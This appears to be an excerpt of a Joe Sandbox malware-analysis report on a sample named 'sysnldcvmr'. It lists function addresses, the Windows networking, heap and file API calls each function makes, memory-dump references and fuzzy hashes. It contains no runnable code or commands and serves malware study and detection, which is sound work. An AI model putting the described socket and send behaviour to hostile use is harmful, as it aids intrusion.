                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: closesocketconnecthtonsshutdownsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1987800339-0
                                                                                                                    • Opcode ID: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
                                                                                                                    • Instruction ID: 10e4ce005d5f4377fb43720ce7fadd865a0fdbaf8ef4bbe44a4c7335c1314f5f
                                                                                                                    • Opcode Fuzzy Hash: cbdb9185097dfb3a9a33e6ecced3d904d4b18b7e3af7f03057a5aabe6a457024
                                                                                                                    • Instruction Fuzzy Hash: 71113974D05209EBCB10DFA8DA496AEB670AF08320F2043A9E529A73D0D7745F01979A
                                                                                                                    Function 00409E70 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
                                                                                                                    • HeapSetInformation.KERNEL32(02190000,00000000,00000002,00000004), ref: 00409EC6
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00409ECC
                                                                                                                      • Part of subcall function 00409EE0: GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3179415709-0
                                                                                                                    • Opcode ID: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
                                                                                                                    • Instruction ID: d15e15a0956cd53a3f7420caceedbd75f27766a05eec27fee61015ba2f128238
                                                                                                                    • Opcode Fuzzy Hash: f2378abd389c528855b2215640a50ba70f6bde38e81fbf66e01ddb41fd263172
                                                                                                                    • Instruction Fuzzy Hash: D1F0B4B0581304ABD724DB71FC05BA637A8A704705F02803EF6089A2D2EAB9DC44CB9C
                                                                                                                    Function 0040E770 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1378416451-0
                                                                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                                                                    Function 00409DB0 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                                                                    • RtlAllocateHeap.NTDLL(02190000,?,-0000000C), ref: 00409DFA
                                                                                                                    • memset.NTDLL ref: 00409E34
                                                                                                                      • Part of subcall function 00409E70: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00409DC7,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E9C
                                                                                                                      • Part of subcall function 00409E70: HeapSetInformation.KERNEL32(02190000,00000000,00000002,00000004), ref: 00409EC6
                                                                                                                      • Part of subcall function 00409E70: GetCurrentProcessId.KERNEL32 ref: 00409ECC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3494217179-0
                                                                                                                    • Opcode ID: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
                                                                                                                    • Instruction ID: bc348cf5c9b079020b3d900c37522172a8fbba108f4db171397f18f444666f8c
                                                                                                                    • Opcode Fuzzy Hash: d8037d4416afb632a3dc4f98f72e54e87fb15f54c14e696db28e718d2a8b7ec8
                                                                                                                    • Instruction Fuzzy Hash: A611FEB5900108BBCB10EFA5D845B9E7BB5AF44305F14C169F909BB382D638DE54CB99
                                                                                                                    Function 0040D550 Relevance: 3.0, APIs: 2, Instructions: 49synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                                                                      • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                      • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                      • Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                                                                      • Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040D57D
                                                                                                                    • WaitForSingleObject.KERNEL32(00000608,00001388), ref: 0040D5C7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3920643007-0
                                                                                                                    • Opcode ID: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
                                                                                                                    • Instruction ID: ebe6697be7004dc57312df383308c6bc29ac17b58d9e4cbca4aa496e4513f42a
                                                                                                                    • Opcode Fuzzy Hash: a86012ae710333058172dcdbedf12253eac4732d168f1a6e5cd698471d501b85
                                                                                                                    • Instruction Fuzzy Hash: 1F11A575E00208BBE704EBE4DC4ABAF7734AB04704F148179F901772D1E6B5AA44CB89
                                                                                                                    Function 0040ADD0 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                                                                    • gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: gethostbynamegethostname
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3961807697-0
                                                                                                                    • Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                    • Instruction ID: 4c25e3467811ff68b39612d5822c2a685709a2e0bc46d2761966ab013cae1a79
                                                                                                                    • Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
                                                                                                                    • Instruction Fuzzy Hash: 4E1112349442288BCB24CF24C848BD9B771AB65314F1886D6D4C9673D0C7F96DD5CF86
                                                                                                                    Function 0040AA40 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: gethostbynameinet_addr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1594361348-0
                                                                                                                    • Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                    • Instruction ID: cb50bac6aa0e7e12dc0343020e8a378ceee1aa6c6dd57b9abb221f5468a140c1
                                                                                                                    • Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
                                                                                                                    • Instruction Fuzzy Hash: D9F0A274900208EFCB14DFE4D54899EBBB4EB49311F1083A6D905573A0D7749E90DF45
                                                                                                                    Function 0040B420 Relevance: 3.0, APIs: 2, Instructions: 16synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(00000608,000003E8), ref: 0040B42E
                                                                                                                    • InterlockedDecrement.KERNEL32(00415260), ref: 0040B440
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecrementInterlockedObjectSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4086267124-0
                                                                                                                    • Opcode ID: 040714827fe75f1fa5521dd8f7f71bf1496fed6b52bc5ae53ab0c45206f60a91
                                                                                                                    • Instruction ID: 19902dc294b38e57afb5a04d7a561a5dae5f2b0dcbf69620d3c261a402e6fa36
                                                                                                                    • Opcode Fuzzy Hash: 040714827fe75f1fa5521dd8f7f71bf1496fed6b52bc5ae53ab0c45206f60a91
                                                                                                                    • Instruction Fuzzy Hash: FFD0A73164430857C6006BA1EC4ABAA3A2FE710700B50C037F305F11C2CBBCD990979E
                                                                                                                    Function 0040AB40 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • shutdown.WS2_32(0040AB2D,00000002), ref: 0040AB49
                                                                                                                    • closesocket.WS2_32(0040AB2D), ref: 0040AB53
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: closesocketshutdown
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572888783-0
                                                                                                                    • Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                    • Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
                                                                                                                    • Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
                                                                                                                    • Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94
                                                                                                                    Function 0040B200 Relevance: 2.5, APIs: 2, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                                                                    • LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3168844106-0
                                                                                                                    • Opcode ID: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
                                                                                                                    • Instruction ID: 4173032fab3eb0730c98540359f75f4152e7c09aa21c3b13d5d70a64086a5cd8
                                                                                                                    • Opcode Fuzzy Hash: 839316003de6d4969e72e9a64bdcbbbec430ca9f73e83315ba2c9423ae0d711a
                                                                                                                    • Instruction Fuzzy Hash: F4E01AB4941208EFCB14DF84FC09BD97B68E704305F12806DE90853390D7B5AE90DA9D
                                                                                                                    Function 0040AB60 Relevance: 2.5, APIs: 2, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB68
                                                                                                                    • LeaveCriticalSection.KERNEL32(00416690,?,0040B3F7), ref: 0040AB78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3168844106-0
                                                                                                                    • Opcode ID: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
                                                                                                                    • Instruction ID: 927706f0d4a3faa36ccdeaf6698e9d1267a6522d247c521c6b95ccff81df7cb1
                                                                                                                    • Opcode Fuzzy Hash: 81c3f962b9ec76ce2805c60adb74695caac985be6cbd1f024fba086166782042
                                                                                                                    • Instruction Fuzzy Hash: 09B09B341C03059B81103F95BC0BBCC3F1895047653128036FD0954051DDE5B4D4D95F
                                                                                                                    Function 0040A1B0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00409E50: GetCurrentProcessId.KERNEL32(?,00409DBB,?,0040C6CE,00000010,?,?,?,?,?,?,0040C43B), ref: 00409E53
                                                                                                                    • RtlFreeHeap.NTDLL(02190000,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentFreeHeapProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3855406826-0
                                                                                                                    • Opcode ID: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
                                                                                                                    • Instruction ID: 3faa604e5be9d5a0263373ae2e3f7e010bf72a20a2b1d8f85abd2c6c7d5d41cb
                                                                                                                    • Opcode Fuzzy Hash: 5c77f0e4d4085861ac8a8ab167670b2290c4d540b64ade23244c922168c35f16
                                                                                                                    • Instruction Fuzzy Hash: 11F06874900308AFDB04DFD5D8449ADBB75AF94304F10C1AEEA086B381FA36DD51CB95
                                                                                                                    Function 0040CC90 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • send.WS2_32(00000000,00000000,?,00000000), ref: 0040CCAF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: send
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2809346765-0
                                                                                                                    • Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                    • Instruction ID: 45736cdf7257a26a41736574bf54bf9ad9d0bdd3ada43f241fa33aa1b29d5f37
                                                                                                                    • Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                                                                    • Instruction Fuzzy Hash: E201317490834DEFDB00CFA8C884BDD7BB4BB08314F148299E819A7381D3759695DB55
                                                                                                                    Function 0040CEB0 Relevance: 1.5, APIs: 1, Instructions: 25synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                                                                      • Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                                                                    • WaitForSingleObject.KERNEL32(00000608,00001388), ref: 0040CEDC
                                                                                                                      • Part of subcall function 0040CAD0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3309573332-0
                                                                                                                    • Opcode ID: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
                                                                                                                    • Instruction ID: 44ae0f0a1ed3c9862aadb4204bdd5a5f8f47b864d141f75822239993b39a6931
                                                                                                                    • Opcode Fuzzy Hash: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
                                                                                                                    • Instruction Fuzzy Hash: 91E0927094030CE6D714E7A1D846B6F722AA710305F14427EF501762C2DA7A9E40D7DC
                                                                                                                    Function 004072C0 Relevance: 1.5, APIs: 1, Instructions: 23comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInstance
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 542301482-0
                                                                                                                    • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                    • Instruction ID: 4030d214640323180f81309a45cda4b6a66b11fae01bbf3bc15f759713f42cbd
                                                                                                                    • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                                                    • Instruction Fuzzy Hash: 07E0ED74D0020CFFDF00DF94C889BDEBBB8AB04315F1081A9F90467280D7B56A94DB95
                                                                                                                    Function 004062C0 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406320: GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                                                                    • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DriveTypelstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664088370-0
                                                                                                                    • Opcode ID: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                                                                    • Instruction ID: 8c00fedf36f089a4a79421f594ce94f1f5e858f4e01688578a9b7e0a2acaca41
                                                                                                                    • Opcode Fuzzy Hash: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                                                                    • Instruction Fuzzy Hash: 96F01D75900208FBDB04DFA4D4557DEB7B4EF44304F14C5A9E819AB280E679AB58CB89

                                                                                                                    Non-executed Functions

                                                                                                                    Function 004066B0 Relevance: 80.8, APIs: 35, Strings: 11, Instructions: 305fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                                                                    • wsprintfW.USER32 ref: 0040670F
